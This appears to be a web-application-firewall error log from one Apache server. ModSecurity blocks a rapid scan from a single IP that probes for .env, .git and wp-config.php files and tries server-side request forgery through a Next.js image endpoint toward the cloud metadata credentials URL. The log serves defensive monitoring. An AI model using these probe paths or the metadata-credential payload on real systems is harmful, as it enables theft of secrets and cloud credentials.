[Mon May 11 15:23:09.368399 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:2574] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYPVchVQ3tCn0m9OpZEAAAAQg"]
[Mon May 11 15:23:09.368460 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:2544] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYPaO9RdIr1DwxYR2SpgAAANM"]
[Mon May 11 15:23:09.368512 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:2574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYPVchVQ3tCn0m9OpZEAAAAQg"]
[Mon May 11 15:23:09.368569 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:2544] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYPaO9RdIr1DwxYR2SpgAAANM"]
[Mon May 11 15:23:09.368685 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:2574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYPVchVQ3tCn0m9OpZEAAAAQg"]
[Mon May 11 15:23:09.368759 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:2544] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYPaO9RdIr1DwxYR2SpgAAANM"]
[Mon May 11 15:23:09.369432 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYPeJEyNRN152ArOSMvQAAAFc"]
[Mon May 11 15:23:09.369554 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYPeJEyNRN152ArOSMvQAAAFc"]
[Mon May 11 15:23:09.369729 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYPeJEyNRN152ArOSMvQAAAFc"]
[Mon May 11 15:23:09.370252 2026] [security2:error] [pid 1319885:tid 1319892] [client 195.178.110.133:2530] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPVchVQ3tCn0m9OpZEQAAAQQ"]
[Mon May 11 15:23:09.370906 2026] [security2:error] [pid 1319885:tid 1319892] [client 195.178.110.133:2530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPVchVQ3tCn0m9OpZEQAAAQQ"]
[Mon May 11 15:23:09.371115 2026] [security2:error] [pid 1319885:tid 1319892] [client 195.178.110.133:2530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPVchVQ3tCn0m9OpZEQAAAQQ"]
[Mon May 11 15:23:09.378968 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYPeSQ-m-m0ukSShuB2wAAAUI"]
[Mon May 11 15:23:09.379033 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:2652] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYPaO9RdIr1DwxYR2SpwAAANE"]
[Mon May 11 15:23:09.379100 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYPeSQ-m-m0ukSShuB2wAAAUI"]
[Mon May 11 15:23:09.379183 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:2652] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYPaO9RdIr1DwxYR2SpwAAANE"]
[Mon May 11 15:23:09.379305 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYPeSQ-m-m0ukSShuB2wAAAUI"]
[Mon May 11 15:23:09.379423 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:2652] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYPaO9RdIr1DwxYR2SpwAAANE"]
[Mon May 11 15:23:09.381219 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:2624] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYPeJEyNRN152ArOSMvgAAAE4"]
[Mon May 11 15:23:09.381343 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:2624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYPeJEyNRN152ArOSMvgAAAE4"]
[Mon May 11 15:23:09.381547 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:2624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYPeJEyNRN152ArOSMvgAAAE4"]
[Mon May 11 15:23:09.381977 2026] [security2:error] [pid 1319998:tid 1320012] [client 195.178.110.133:2636] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYPat2WtvoFr7xvGzUVQAAAIw"]
[Mon May 11 15:23:09.382087 2026] [security2:error] [pid 1319998:tid 1320012] [client 195.178.110.133:2636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYPat2WtvoFr7xvGzUVQAAAIw"]
[Mon May 11 15:23:09.382102 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:2492] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYPaO9RdIr1DwxYR2SqAAAANI"]
[Mon May 11 15:23:09.382238 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:2492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYPaO9RdIr1DwxYR2SqAAAANI"]
[Mon May 11 15:23:09.382275 2026] [security2:error] [pid 1319998:tid 1320012] [client 195.178.110.133:2636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYPat2WtvoFr7xvGzUVQAAAIw"]
[Mon May 11 15:23:09.382426 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:2492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYPaO9RdIr1DwxYR2SqAAAANI"]
[Mon May 11 15:23:09.382783 2026] [security2:error] [pid 1319953:tid 1319965] [client 195.178.110.133:2554] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB3AAAAUo"]
[Mon May 11 15:23:09.382890 2026] [security2:error] [pid 1319953:tid 1319965] [client 195.178.110.133:2554] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB3AAAAUo"]
[Mon May 11 15:23:09.383059 2026] [security2:error] [pid 1319953:tid 1319965] [client 195.178.110.133:2554] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB3AAAAUo"]
[Mon May 11 15:23:09.383378 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:2514] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.384266 2026] [proxy_fcgi:error] [pid 1319953:tid 1319974] [client 195.178.110.133:2562] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.397247 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPat2WtvoFr7xvGzUVgAAAIE"]
[Mon May 11 15:23:09.397860 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPat2WtvoFr7xvGzUVgAAAIE"]
[Mon May 11 15:23:09.398053 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPat2WtvoFr7xvGzUVgAAAIE"]
[Mon May 11 15:23:09.402432 2026] [proxy_fcgi:error] [pid 1319953:tid 1319974] [client 195.178.110.133:2562] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.421151 2026] [proxy_fcgi:error] [pid 1319953:tid 1319974] [client 195.178.110.133:2562] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.432475 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPat2WtvoFr7xvGzUWAAAAIE"]
[Mon May 11 15:23:09.433064 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPat2WtvoFr7xvGzUWAAAAIE"]
[Mon May 11 15:23:09.433262 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPat2WtvoFr7xvGzUWAAAAIE"]
[Mon May 11 15:23:09.438493 2026] [proxy_fcgi:error] [pid 1319953:tid 1319974] [client 195.178.110.133:2562] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.447405 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB4wAAAUI"]
[Mon May 11 15:23:09.447520 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB4wAAAUI"]
